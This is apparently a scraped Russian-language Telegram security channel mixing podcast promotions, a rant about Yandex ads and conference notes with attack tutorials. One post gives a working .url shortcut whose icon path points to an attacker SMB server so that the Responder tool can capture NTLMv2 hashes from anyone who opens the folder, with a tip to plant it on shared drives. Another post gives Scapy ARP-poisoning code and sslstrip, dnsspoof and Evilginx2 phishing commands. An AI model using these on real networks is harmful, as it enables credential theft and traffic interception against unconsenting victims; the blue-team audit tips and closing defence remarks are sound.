Каждый кто увидит - окаменеет отдаст свой пароль
Доброе утро! Сегодня расскажу о одном простом способе воровства NTLMv2 хэшей
1. Подготовка. Создаём интернет ярлык (.url), кстати, на такой файл НЕ будут жаловаться антивирусы🙈
2. Запускаем responder, что бы принимать хэши
3. Подкидываем жертве файл и рыбачим🎣 Ждём, когда кто-то откроет папку с нашим файлом
4. БИНГО! Хэш у нас💃 Дальше можно брутить, но это уже другая история
Хинт для красных👽 :
Хинт для синих👽 :
Подписывайтесь на канал, дальше больше!
Пост имеет ознакомительный характер и предназначена для специалистов по безопасности. Автор и редакция не несут ответственности за любой вред, причиненный с применением изложенной информации. Распространение вредоносных программ, нарушение работы систем и нарушение тайны переписки преследуются по закону.
Доброе утро! Сегодня расскажу о одном простом способе воровства NTLMv2 хэшей
1. Подготовка. Создаём интернет ярлык (.url), кстати, на такой файл НЕ будут жаловаться антивирусы
[InternetShortcut]
URL=RedBlue
WorkingDirectory=notes
IconFile=\\172.16.71.71\%USERNAME%.icon
IconIndex=1
2. Запускаем responder, что бы принимать хэши
sudo responder -I eth0
3. Подкидываем жертве файл и рыбачим
4. БИНГО! Хэш у нас
Хинт для красных
Можете прятать такие файлы на общедоступных шарах, ловить хэши и горизонтально перемещаться
Хинт для синих
Периодически проводите аудиты того, что лежит в шарах, а то вдруг кто-то положит .url или, может кто-то хранит password.txt🤣
Подписывайтесь на канал, дальше больше!
Please open Telegram to view this post
VIEW IN TELEGRAM
1 4🤯3 1
Audio
Ого, 4-ый выпуск так быстро! Спасибо, что вы нас слушаете, мотивируете!
Сегодня промежуточный выпуск: захотели поговорить про IoT и другие «умные штуки». Как они влияют на нашу жизнь, чем могут реально напугать и почему иногда тостер или зубная щётка звучат страшнее, чем хакер с ноутбуком. Потравили пару баек, ну и как обычно рассказали лучшие способы решения проблем!
Кроме того, нас просят, чтобы подкаст выходил на Яндекс.Музыке, но при всём уважении к подписчикам и неуважении к компании на последнюю букву алфавита, на этой площадке мы не будем появляться. На то есть причины (когда-нибудь о них расскажет один из авторов, но не сейчас — интрига???).
Мы подумаем, где ещё можно будет залиститься.
А ещё мы экспериментируем со звуком и ищем лучшее звучание — так что каждая новая запись для нас тоже немного тест.
Кстати, мы теперь:
🟢 Spotify
🟣 Apple Music
🔴 YouTube
🔵 Web
🟡 Index
Так что слушать стало ещё удобнее.
Если нравится то, что мы делаем — ставьте лайки и подписывайтесь, так вы помогаете подкасту расти.
Сегодня промежуточный выпуск: захотели поговорить про IoT и другие «умные штуки». Как они влияют на нашу жизнь, чем могут реально напугать и почему иногда тостер или зубная щётка звучат страшнее, чем хакер с ноутбуком. Потравили пару баек, ну и как обычно рассказали лучшие способы решения проблем!
Кроме того, нас просят, чтобы подкаст выходил на Яндекс.Музыке, но при всём уважении к подписчикам и неуважении к компании на последнюю букву алфавита, на этой площадке мы не будем появляться. На то есть причины (когда-нибудь о них расскажет один из авторов, но не сейчас — интрига???).
Мы подумаем, где ещё можно будет залиститься.
А ещё мы экспериментируем со звуком и ищем лучшее звучание — так что каждая новая запись для нас тоже немного тест.
Кстати, мы теперь:
Так что слушать стало ещё удобнее.
Если нравится то, что мы делаем — ставьте лайки и подписывайтесь, так вы помогаете подкасту расти.
Please open Telegram to view this post
VIEW IN TELEGRAM
1 4
Forwarded from PRO:PENTEST
Разведка_для_физического_пентеста.drawio
49.9 MB
А вот и редактируемая карта для вашего удобства. Делитесь, пользуйтесь, комментируйте🔥
MITM олдскул из нулевых?!
АРП-призрак🔫
Один из самых популярных способов MITM-атаки в локальных сетях. Злоумышленник отправляет ложные ARP-ответы, заставляя устройства в сети связываться с ним вместо настоящего шлюза. Это позволяет перехватывать и изменять трафик между устройствами.
Инструменты: arpspoof (Kali Linux), Scapy (Python)
Пример: Использование Scapy для создания ARP-спуфинга:
Лишаем трафик защиты одним движением руки🧘♀️
Атака, при которой злоумышленник перехватывает HTTPS-соединение и перенаправляет его на HTTP, удаляя SSL/TLS-шифрование. Это позволяет читать и изменять передаваемые данные.
Инструменты: sslstrip, mitmproxy
Пример: Запуск sslstrip с использованием iptables для перенаправления трафика:
Подменяем дорожные знаки💃
Атака, при которой злоумышленник подменяет записи DNS-сервера, перенаправляя трафик на фальшивые сайты. Это может привести к фишинговым атакам или распространению вредоносного ПО.
Инструменты: dnsspoof (Kali Linux), mitmproxy
Пример: Использование dnsspoof для подмены DNS-записей:
Цифровой троянский конь👀
Атака, при которой вредоносное ПО в браузере изменяет содержимое веб-страниц или перехватывает вводимые данные, такие как логины и пароли.
Инструменты: BeEF (Browser Exploitation Framework), Evilginx2
Пример: Использование Evilginx2 для фишинга с перехватом сессий:
Заключение🍩
Как видите, олдскульные MITM-атаки из нулевых, несмотря на свой возраст, блестяще демонстрируют фундаментальные уязвимости в самих принципах работы сетей. Эти техники не канули в Лету — они эволюционировали, стали частью сложных многоуровневых атак и инструментария пентестеров. Знание этой классики — не призыв к анархии, а лучший способ понять логику защиты. Современные методы вроде строгого HTTPS (HSTS), DNSSEC, аппаратной аутентификации ARP и защиты на уровне браузера рождены именно как ответ на эти простые, но гениальные атаки.
Подписывайтесь на канал, дальше больше!
Пост имеет ознакомительный характер и предназначена для специалистов по безопасности. Автор и редакция не несут ответственности за любой вред, причиненный с применением изложенной информации. Распространение вредоносных программ, нарушение работы систем и нарушение тайны переписки преследуются по закону.Man-in-the-Middle (MITM) атаки из заумной теории превратились в доступный для любого энтузиаста инструмент. Это был настоящий «дикий запад» сетевой безопасности, где арсенал хакера часто ограничивался лишь знанием протоколов и парой скриптов в Kali Linux. Давайте посмотрим к чему пришли хакеры и что стало популярным в их арсенале.
АРП-призрак
Один из самых популярных способов MITM-атаки в локальных сетях. Злоумышленник отправляет ложные ARP-ответы, заставляя устройства в сети связываться с ним вместо настоящего шлюза. Это позволяет перехватывать и изменять трафик между устройствами.
Инструменты: arpspoof (Kali Linux), Scapy (Python)
Пример: Использование Scapy для создания ARP-спуфинга:
from scapy.all import *
def arp_poison(target_ip, gateway_ip):
target_mac = getmacbyip(target_ip)
gateway_mac = getmacbyip(gateway_ip)
arp_target = ARP(op=2, pdst=target_ip, psrc=gateway_ip, hwdst=target_mac)
arp_gateway = ARP(op=2, pdst=gateway_ip, psrc=target_ip, hwdst=gateway_mac)
send(arp_target)
send(arp_gateway)
Лишаем трафик защиты одним движением руки
Атака, при которой злоумышленник перехватывает HTTPS-соединение и перенаправляет его на HTTP, удаляя SSL/TLS-шифрование. Это позволяет читать и изменять передаваемые данные.
Инструменты: sslstrip, mitmproxy
Пример: Запуск sslstrip с использованием iptables для перенаправления трафика:
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000
sslstrip -l 10000
Подменяем дорожные знаки
Атака, при которой злоумышленник подменяет записи DNS-сервера, перенаправляя трафик на фальшивые сайты. Это может привести к фишинговым атакам или распространению вредоносного ПО.
Инструменты: dnsspoof (Kali Linux), mitmproxy
Пример: Использование dnsspoof для подмены DNS-записей:
dnsspoof -i eth0 -f hosts.txt
Цифровой троянский конь
Атака, при которой вредоносное ПО в браузере изменяет содержимое веб-страниц или перехватывает вводимые данные, такие как логины и пароли.
Инструменты: BeEF (Browser Exploitation Framework), Evilginx2
Пример: Использование Evilginx2 для фишинга с перехватом сессий:
evilginx2 -p phishlets/office365
Заключение
Как видите, олдскульные MITM-атаки из нулевых, несмотря на свой возраст, блестяще демонстрируют фундаментальные уязвимости в самих принципах работы сетей. Эти техники не канули в Лету — они эволюционировали, стали частью сложных многоуровневых атак и инструментария пентестеров. Знание этой классики — не призыв к анархии, а лучший способ понять логику защиты. Современные методы вроде строгого HTTPS (HSTS), DNSSEC, аппаратной аутентификации ARP и защиты на уровне браузера рождены именно как ответ на эти простые, но гениальные атаки.
Подписывайтесь на канал, дальше больше!
Please open Telegram to view this post
VIEW IN TELEGRAM
Блин, ребята, крик души одного из админов. Пользоваться сервисами Яндекса становится просто невыносимо: невозможно вызвать такси без рекламы, невозможно что-то найти без рекламы. Скажите, вы считаете такое поведение монополиста на рынке ИТ-технологий адекватным?
Многие компании грешат рекламой своих продуктов, но тут почти в каждом продукте Яндекса либо реклама самих себя, либо просто реклама. В каждом Telegram-паблике — реклама Яндекса. Один из админов даже отказался от всех сервисов компании, кроме такси — потому что, увы, выбора просто нет. Разочаровывает то, что вместо того чтобы создавать действительно качественные продукты (постоянно падающие облака, проблемная сетевая инфраструктура), они вставляют рекламу буквально везде, где есть свободное место. И особенно забавно, что у админа подписка «Плюс»… Интересно, без неё рекламы ещё больше?
Невозможно вызвать такси без надоедливой плашки, а вы видели цены на абрикосы в их лавке — 100 рублей? Начинает это конкретно раздражать.
Вызывал такси, всплыла реклама на весь экран раза 2, просто ужас...
P.S.
Понимаю реклама есть везде, но обычно это фиксится тем, что ты платишь за ее отсутствие🙂
И это даже не та причина, почему не нравится компания на букву "Я".
Многие компании грешат рекламой своих продуктов, но тут почти в каждом продукте Яндекса либо реклама самих себя, либо просто реклама. В каждом Telegram-паблике — реклама Яндекса. Один из админов даже отказался от всех сервисов компании, кроме такси — потому что, увы, выбора просто нет. Разочаровывает то, что вместо того чтобы создавать действительно качественные продукты (постоянно падающие облака, проблемная сетевая инфраструктура), они вставляют рекламу буквально везде, где есть свободное место. И особенно забавно, что у админа подписка «Плюс»… Интересно, без неё рекламы ещё больше?
Невозможно вызвать такси без надоедливой плашки, а вы видели цены на абрикосы в их лавке — 100 рублей? Начинает это конкретно раздражать.
Вызывал такси, всплыла реклама на весь экран раза 2, просто ужас...
P.S.
Понимаю реклама есть везде, но обычно это фиксится тем, что ты платишь за ее отсутствие
И это даже не та причина, почему не нравится компания на букву "Я".
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
11👍7
RedBlue Notes на OFFZONE 2025!!
Хоть сегодня только первый день конференции, но я уже получил море положительных эмоций. Послушал доклад легендарного Евгения, спаял себе новый аддон и ещё 1 получил за квест, пополнил свою ИБ библиотеку ресёчем.
В моей коллекции +-10 аддонов, что по меркам конфы много. Но я встретил того, кто собрал ЁЛЕУ из кучи аддонов. Просто вау🔝
Хоть сегодня только первый день конференции, но я уже получил море положительных эмоций. Послушал доклад легендарного Евгения, спаял себе новый аддон и ещё 1 получил за квест, пополнил свою ИБ библиотеку ресёчем.
В моей коллекции +-10 аддонов, что по меркам конфы много. Но я встретил того, кто собрал ЁЛЕУ из кучи аддонов. Просто вау
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from assume birch
Сегодня весь день выступаем на OFFZONE
Приходите на Community.Track, за лучшие вопросы подарим наш мерч.
Можно получить худи с патчами, футболку с нашим лого или ежедневник
Приходите на Community.Track, за лучшие вопросы подарим наш мерч.
Можно получить худи с патчами, футболку с нашим лого или ежедневник